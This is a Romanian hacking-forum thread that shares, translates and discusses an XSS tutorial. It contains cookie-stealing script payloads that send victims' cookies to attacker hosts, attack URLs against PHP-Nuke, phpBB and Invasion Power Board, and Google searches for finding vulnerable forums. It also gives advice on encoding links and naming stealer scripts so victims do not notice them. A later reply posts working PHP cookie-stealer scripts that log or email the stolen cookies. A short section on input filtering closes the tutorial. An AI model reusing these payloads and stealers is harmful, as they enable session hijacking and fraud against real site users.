Hacking and more...
HaCkinG CulT
|
Lista Forumurilor Pe Tematici
|
Hacking and more... | Reguli | Inregistrare | Login
POZE HACKING AND MORE...
Nu sunteti logat.
|
Nou pe simpatie: corinarus 23 ani
| Femeie 23 ani Cluj cauta Barbat 24 - 60 ani |
|
sharky3010
B-Boy
Din: Cluj
Inregistrat: acum 18 ani
Postari: 613
|
|
Download link 1 here Download link 2 here ----------- Contents: ----------- *Introduction *What Are XSS Attacks? *Script Injection & XSS *What Can Attackers Do With XSS? *An Attack Scenario *Hunting Down Vulnerable Sites *Examples of XSS Exploits & Vulnerabilities *Encoding Attack URL's *How Can I Protect Myself Against XSS Attacks? *What Can I The Vendor Do? *Conclusion *Vendor Information *Greetz To *About The Author
Modificat de sharky3010 (acum 17 ani)
_______________________________________
|
|
pus acum 17 ani |
|
hfhun
Elite Member
Inregistrat: acum 18 ani
Postari: 593
|
|
|
pus acum 17 ani |
|
HIENA
Old School Member
Din: Pe luna cu extraterestri
Inregistrat: acum 18 ani
Postari: 433
|
|
faceti si voi un tutorial video daca se poate cu metoda xss daca nu cer prea mult ca mi-e lene sa citesc
|
|
pus acum 17 ani |
|
z3nDo0r2k`
Junior
Inregistrat: acum 17 ani
Postari: 21
|
|
pai daca tie lene sa citesti cum vrei sa invetzi ?! crezi ca ai sa reusesti vreodata sa invetzi ceva daca nu pui mana sa citesti sa te interesezi si chiar daca itzi da cineva ce sa citesti tot tre sa cautzi si sa citesti si mai mult apoi sa pui in practica ca tutorialul video nu o sa te ajute cu nimic .... crede-ma ... ce o sa itzi prezinte cineva in tutorial o sa fie o singura metoda ...
|
|
pus acum 17 ani |
|
sharky3010
B-Boy
Din: Cluj
Inregistrat: acum 18 ani
Postari: 613
|
|
Am corectat si link-urile.Daca o sa am timp o sa traduc tutorialulu in limba romana pentru cei care nu stiu engleza
_______________________________________
|
|
pus acum 17 ani |
|
hfhun
Elite Member
Inregistrat: acum 18 ani
Postari: 593
|
|
Am tradus si eu o parte.
Introducere
Atacurile de tip XSS sunt pe cale sa devina o mare problema daca oamenii nu invata despre atacurile de tip XSS si vulnerabilitati. Vulnerabilitatile XSS au fost gasite in toate tipurile de website-uri , inclusiv fbi.gov, yahoo.com, ebay.com si multe alte siteuri populare si importante, foarte multi administratori nu acorda atentie atacurilor XSS deoarece ori nu stiu prea mult despre acestea ori nu le vad ca pe o amenintare. O vulnerabilitate XSS exploatata de un atacator priceput sau chiar de catre un incepator poate fi un atac foarte puternic. Acest document detaliaza atacurile XSS .
Ce sunt atacurile XSS ?
XSS inseamna Cross Site Scripting, un atac XSS este atunci cand un hacker reuseste sa injecteze cod JavaScript sau uneori alte tipuri de cod intr-un website, facandu-l sa execute codul.
Ce daune ar putea cauza asta? Daca un atacator face un link special , trimitandu-l unei victime care nu se asteapta la asta si da click pe link si se executa un cod JavaScript, cookie-urile victimei sunt trimise hackerului. Cand un atacator face un link malitios , de obicei el va cripta codul in HEX.
Siteurile care sunt vulnerabile la XSS ruleaza un tip de "Continut dinamic" . Acesta este orice care se schimba la interactiunea unui user sau a informatiilor stocate in baza de date despre un user ( gen forumuri ) .
Script Inject si XSS
Sunt doua tipuri de XSS, unul este Script Inject iar celalalt atacul general XSS, un atac de tip XSS este in general folosit pentru a executa coduri javascript pentru a fura identitatea cuiva. Este important sa nu confundati aceste doua tipuri intre ele, amandoua pot fi la fel de periculoase.
Ce pot atacatorii sa faca cu XSS
Cel mai comun atac care este folosit cu vulnerabilitatea XSS este executia JavaScript, pentru furatul cookieurilor. De asemenea, folosind Java Script ar putea fi posibila schimbarea informatiilor de la account-urile userilor.
Cel mai mare risc cauzat de XSS este executia codului pe computerul unui user , dar asta este posibil doar daca este o vulnerabilitate in browserul web folosit de user care permite un asemenea atac.
Un scenariu de atac
Un atacator are o potentiala victima in minte, el stie ca avea victima este pe un site de online shopping, acest website permite userilor sa aiba un cont unde pot cumpara lucruri automat, fara a introduce detaliile cartii de credit. Atacatorul stie ca daca ar lua cookieurile victimei, ar putea sa cumpere lucruri de la acest magazin folosind cartea de credit a victimei.
Atacatorul gaseste o vulnerabilitate XSS in acel website, si trimite un email victimei cu urmatorul cod HTML:
Code:
<a href="http://archives.cnn.com/2001/US/09/16/inv.binladen.denial/?tw=<script>document.location.replace('http://example.com/ph33r/steal.cgi?'+document.cookie);</script>">Check this Article Out! </a> |
Desigur, userul ar da click pe acel link si ar intra pe siteul CNN, dar in acelasi timp atacatorul ar directiona userul spre siteul lui. Acum el are cookieurile userului.
Folosind un editor de cookie-uri, atacatorul copiaza cookieurile victimei si le foloseste pentru el.
Exploit
Code:
[COLOR=[img]http://aaa.aa/=`aaa.jpg[/img]]`style=background:url("javascript:document.location.replace('http://example.com');")[/color] |
Acest cod redirectioneaza victima catre alt website.
Sa vedem aproximativ cate websiteuri vulnerabile putem gasi. Scriind "Powered By Invasion Power Boards 1.3.1" pe Google, putem gasi mii de forumuri vulnerabile, aceasta este principala metoda pe care lamerii o folosesc .
Modificat de hfhun (acum 17 ani)
_______________________________________ "Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for." - The Mentor - The hacker's manifesto
|
|
pus acum 17 ani |
|
weaver
Grand Master
Inregistrat: acum 17 ani
Postari: 208
|
|
ms hfhun
_______________________________________ Catre :Google
|
|
pus acum 17 ani |
|
HORROR
Little Kevin
Inregistrat: acum 17 ani
Postari: 56
|
|
pt cei care cunosc...mai bine zis ... are cineva un astfel de script java?si ce face acel script? unde pune acele cokieurile? astept raspuns
|
|
pus acum 17 ani |
|
HORROR
Little Kevin
Inregistrat: acum 17 ani
Postari: 56
|
|
acel steal.cgi .... il are cineva?
|
|
pus acum 17 ani |
|
sharky3010
B-Boy
Din: Cluj
Inregistrat: acum 18 ani
Postari: 613
|
|
XSS aka Cross Site Scripting ------------------------------------------------- *Introducere *Ce sunt atacurile XSS *Injectare Script si XSS *Ce pot face atacatorii cu XSS *Un scenariu de atac *Cauta site-uri vulnerabile *Exemple Exploit-uri XSS si Vulnerabilitati *Codarea URL-ului de atac *Cum te poti proteja de atacuri XSS *Ce poti face? -------------------------------------------------- --------------------- >>INTRODUCERE<< --------------------- Atacurile XSS au devenit o mare problema si va devenii o problema foarte grava daca oamenii nu se informeaza despre atacurile si vulnerabiliatile XSS.Vulnerabilitatea Cross Site Scripting a fost gasita in toate tipurile de site-uri incluzand si fbi.gov, yahoo.com, ebay.com si multe alte site-uri populare si importante;Multi administratori nu acorda atentie acestor atacuri deoarece nu stiu multe despre XSS si nu le considera ca o amenintare.Cand o vulnerabilitate XSS este exploatata de un hacker experimentat sau chiar de unul novice poate fii un atac foarte puternic.Acest articol detaliaza atacurile XSS si spera sa te ajuta in a le intelege mai bine,cum hackerii le folosesc si bineinteles cum sa te protejezi impotriva lor.
---------------------------------- >>CE SUNT ATACURILE XSS<< ---------------------------------- XSS mai este cunoscut ca si Cross Site Scripting.Un atac XSS este realizat atunci cand atacatorul reuseste sa injecteze un cod Java Script sau alt cod. Ce poate cauza?Daca atacatorul creeaza un link special si il trimite victimei,iar victima acceseaza link-ul,acel cod Java trimite cookie-ul victimei unui script CGI si de aici stiti ce se intampla.Cand un atacator creeaza un link malitios ,de obicei il codeaza in HEX sau alte cod pentru a ascunde link-ul infectat. Website-urile vulnerabile atacurilor XSS au de obicei continut dinamic ,adica orice aduce schimbari in interactiunea userului pe site sau a informatiilor stocate in baza de date despre user.Acest continut dinamic se refera la Forum-uri,E-mail-uri bazate pe web si multe altele unde informatia este trimisa catre server.
----------------------------------------------- >>INJECTAREA SCRIPT-URILOR si XSS<< ----------------------------------------------- Sunt doua tipuri de XSS,unul din ele fiind injectare scrit-urilor iar celelalt fiind atacul XSS general.Un atac Cross Site Scripting este normal folosit pentru a executa script-uri java pentru a fura identitatea/contul cuiva iar uneori este folosit pentru alterarea temporara a paginilor.Odata ce a fost injectat un script pagina este alterata permanent.Este important a nu confunda cele doua metode de XSS, amandoua metodele sunt la fel de periculoase si este important sa-ti protejezi soft-ul/site-ul de ele.
------------------------------------------- >>CE POT FACE ATACATORI CU XSS<< ------------------------------------------- Cel mai cunoscut atac este cel in care atacatorul foloseste vulnerabilitatea care consta in "sterpelirea" cookie-urilor. Cu java script se mai pot aduce modificari in detaliile unui cont. Cel mai mare risc pe care il reprezinta XSS este executare unor coduri pe computerele userilor.Pentru a evita asemenea atacuri este indica sa va faceti toate update-urile la timp.RECOMANDATA ESTE SA FOLOSITI Mozilla Firefox ca si browser nu Internet Explorer,Netscap,Opera etc.
-------------------------------- >>SCENARIUL UNUI ATAC<< -------------------------------- Presupunem un atacator care are o anumita victima in minte.El stie ca victima este online pe site-ul de cumparaturi online.Acest site ca multe altele permite vizitatorilor creearea unui cont personal unde pot cumpara diferite lucruri fara a acesa detaliile cartii de credit.Aceasta metoda este folosita pentru a prevenii key-loggingul.Detaliile cartilor de credit sunt stocate pe site. Atacatorul stie ca poate fura cookie-ul victimei si ca va fii capabil de a cumpara de pe site folosind cartea de credit a victimei.El trimite un e-mail victimei cu urmatorul continut
Code:
<A HREF="http://archives.cnn.com/2001/US/09/16/inv.binladen.denial/?tw=<
script>document.location.replace('http://freewebhost.com/ph33r/steal.cgi?'+docum
ent.cookie);</script>">Check this Article Out! </a> |
Victima aceseaza link-ul si va fi redirectionata spre CNN News Article dar in acelasi timp atacatorul a reusit sa fure cookie-ul datorita link-ului special.Acum poate inlocui si folosi cookie-ul cu ajutorul Firefox Cookie Editor.Acum hackerul reimprospateaza pagina [REFRESH] si este logat in contul victimei
----------------------------------------- >>CAUTA SITE-URI VULNERABILE<< ----------------------------------------- In caz ca eti detinatorul unui site te poti gandii ca site-ul tau nu contine nici o informatie importanta [daca asa este] de ce trebuie sa te ingrijoreze atacurile XSS??? Asadar este un motiv foarte simplu pentru ingrijorare,este o cale foarte usora pentru atacatori sa "vaneze" site-uri. Acesti atacatori "scripts kiddies" folosesc deseori aceasta metoda pentru "vanarea" aplicatiilor web fiidca sunt extrem de usor de exploatat iar cand oamenii nu acorda atentie acestor vulnerabilitati sunt "deschisi" atacurilor.Acesti "script kiddied" folosesc "o scula" pe care o foloseste aproape oricine in ziua de azi. Aceasta "scula" este Google.Poate ai auzit deja de Google Hacking.Poate nu sti cat de usor este sa gasesti site-uri vulnerabile cu Google. Daca eu as fi un kiddie script primul lucru pe care l-as face ar fi sa gasesc "o bucata" de soft vulnerabila si bineinteles sa o explaotez.Dupa o cautare rapida pe Google am gasit ca Power Board 1.3.1 Final este vulnerabil la XSS.Am reusit sa obtin si un PoC [Proof of Concept] exploit din Bugtraq
Exploit-ul:
Code:
[COLOR=[img]http://aaa.aa/=`aaa.jpg[/img]]`style=background:url("javascript:doc
ument.location.replace('http://hackerlounge.com');") [/color] |
PoC-ul redirectioneaza victima catre alt site Acum este timpul sa vedem aproximativ cate "tinte" putem gasi.Asta o putem face simplu tastand in google search "Powered by Invasion Power Board 1.3.1" [cu tot cu ghilimele].Dupa cum vezi ai ce alege.
---------------------------------------------------------------- >>EXEMPLE EXPLOIT-URI XSS SI VULNERABILITATI<< ----------------------------------------------------------------
PHP Nuke:
Code:
http://localhost/nuke73/modules.php?name=News&file=article&sid=1&optionbox=['
http://freewebhost.com/ph33r/steal.cgi?'+document.cookie] |
PHPbb Forum:
Code:
http://localhost.com/phpBB2/login.php('http://freewebhost.com/ph33r/steal.cgi?'
document.cookie) |
Invasion Power Board:
Code:
http://[target]/index.php?act='><script>alert(document.cookie)</script> |
Dupa ce arunci o privire asupra explit-urilor iti vei da seama cam ce afecteaza XSS.
-------------------------------------- >>CODAREA URL-ULUI DE ATAC<< -------------------------------------- Codarea url-ului de atac se face foarte simplu. Foloseste urmatorul site pentru codare.
Putem transforma urmatorul link
Code:
http://localhost/nuke73/modules.php?name=News&file=article&sid=1&optionbox=['
http://freewebhost.com/ph33r/steal.cgi?'+document.cookie] |
in
Code:
http://localhost/nuke73/modules.php%3Fname%3DNews%26file%3Darticle%26sid
%3D1%26optionbox%3D%5B%27http%3A//freewebhost.com/ph33r/steal.cgi%3F
%27%2Bdocument.cookie%5D |
Chiar daca acest cod pare mai lung pare mai putin periculos decat cel initial Sfat:-Incercati sa nu folositi numele steal.cgi,fura.cgi sau alte nume care dau de banuit !!!!
----------------------------------------------------- >>CUM TE POTI PROTEJA DE ATACURI XSS<< ----------------------------------------------------- Pentru un raspuns scurt NU ESTE NICI O METODA DE A TE PROTEJA DE ATACURILE XSS Zvonuri precum protectia SSL impotriva XSS nu sunt adevarate !!!! Daca folosesti Internet Explorer te poate ajuta dezactivand Java Script,Java,Flash,VB Script si ActiveX dar totodata iti poate afecta explorarea pe internet.Chiar daca dezactivezi acestea nu va fii foarte dificil pentru atacator sa faca astfel incat codul sa fie executat.
----------------------- >>CE POTI FACE<< ----------------------- Daca site-ul tau nu filtreaza formele de input este foarte usor de inserat un cod.Pentru a prevenii Cross Site Scripting este recomandat sa filtrezi caracterele alfa-numerice:
Code:
>
<
(
)
[
]
'
"
;
:
/
|
Acestea sunt doar o parte din cele care pot alcatui codul infectat.
*Filtreaza caractere periculoase ca cele de mai sus *Converteste toate celelalte caractere care nu sunt cifre/numere,litere *Fi sigur ca pagina web nu iti returneaza input-ul inainte de a fi verificat de potentiale coduri malitioase
O cale buna de a te proteja este sa convertesti caracterele cu echivalentele lor in HTML Exemplu:
Code:
From To
< <
> >
( (
) )
# #
& & |
Inca o metoda buna e sa verifici referalul mail-urilor primite.
---------------------------------------------------------------------- GREETZ FOR THIS TUTORIAL:
htek, HackJoeSite, Read101, Syst3m of Cha0s, The Goon Squad, The Media Assassins, tomchu, FishNET, W--, nrs, IBMWarpst, nic`, Predator, fritz, Nitrous, Alchemist, Nixus, varu, z16bitseg, darkt3ch and r0rkty.
ABOUT THE AUTHOR: Aelphaeis Mangarae a.k.a. Chris Morganti is a security enthusiast and a member at IRC.EFnet.Org #d-u IRC Chat. Please drop by IRC sometime, I look forward to seeing you there. ---------------------------------------------------------------------- Tutorial tradus de Sharky3010 puteti da copy paste la tutorial si sa-l puneti unde vrei chiar si fara credite pt k ma doare in vezica centrala de el
Modificat de sharky3010 (acum 17 ani)
_______________________________________
|
|
pus acum 17 ani |
|
sharky3010
B-Boy
Din: Cluj
Inregistrat: acum 18 ani
Postari: 613
|
|
Un cookie stealer ar putea fii ceva de genu:
Code:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "nn");
?> |
Acest code fura cookie-ul si il scrie intr-un log aflat pe server
Sau poate fii asha
Code:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
mail("me[at]site[dot]ro", "Cookie stealer report", $cookie);
?> |
Acesta trimite cookie-ul pe mail-ul atacatorului
Si codul java script pentru cookie stealer este:
Code:
<script language="JavaScript">
document.location="http://www.site.ro/stealer.php?cookie=" + document.cookie;
</script> |
Modificat de sharky3010 (acum 17 ani)
_______________________________________
|
|
pus acum 17 ani |
|
snoop_dg
Senior
Inregistrat: acum 17 ani
Postari: 118
|
|
deci XSS e de fapt furt de cookie ma ?
|
|
pus acum 17 ani |
|
$-Geo-$
Master of 127.0.0.1
Inregistrat: acum 18 ani
Postari: 133
|
|
cam da(in xss aproape numai cu cookieuri se lucreaza daca nu gresesc)
|
|
pus acum 17 ani |
|